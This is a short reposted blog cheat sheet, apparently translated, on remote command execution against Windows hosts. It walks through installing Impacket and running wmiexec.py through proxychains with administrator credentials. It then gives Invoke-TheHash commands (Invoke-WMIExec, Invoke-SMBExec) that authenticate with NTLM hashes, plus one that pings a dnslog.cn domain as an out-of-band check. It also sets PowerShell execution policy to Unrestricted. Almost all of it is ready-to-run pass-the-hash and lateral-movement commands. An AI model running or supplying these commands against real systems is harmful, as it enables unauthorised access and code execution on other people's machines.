  • Summary of Windows remote command execution

    1. Using Impacket

    Impacket is a Python library that provides low-level programmatic access to protocols such as SMB1-3, and to TCP, UDP, ICMP, IGMP, ARP, IPv4, IPv6, SMB, MSRPC, NTLM, Kerberos, WMI and LDAP over IPv4/IPv6.

    git clone https://github.com/CoreSecurity/impacket.git
    cd impacket/
    python setup.py install

    cd examples

    Demonstration using WMI (wmiexec.py):

    proxychains python wmiexec.py SERVER01/Administrator:password@10.x.x.x

    2. Invoke-TheHash-master

    Functions

    • Invoke-WMIExec
    • Invoke-SMBExec
    • Invoke-SMBEnum
    • Invoke-SMBClient
    • Invoke-TheHash

    Invoke-WMIExec

    • WMI command execution function.
    Example:

    Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

    Invoke-SMBExec

    • SMB (PsExec) command execution function supporting SMB1, SMB2.1, with and without SMB signing.
    Example:

    Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

    Example:

    Check SMB signing requirements on target.

    Invoke-SMBExec -Target 192.168.100.20

    Reproduction:

    Solution:

    Set-ExecutionPolicy -ExecutionPolicy UNRESTRICTED

    Invoke-SMBExec is commonly used for testing:

    Invoke-SMBExec -Target 10.x.190.8 -Username Administrator -Hash efd2aec67e96c7264873c255c08c872f -Command "ping xx.dnslog.cn -n 2"

    Tool download: https://github.com/Kevin-Robertson/Invoke-TheHash

  • Original article: https://www.cnblogs.com/0xdd/p/12433885.html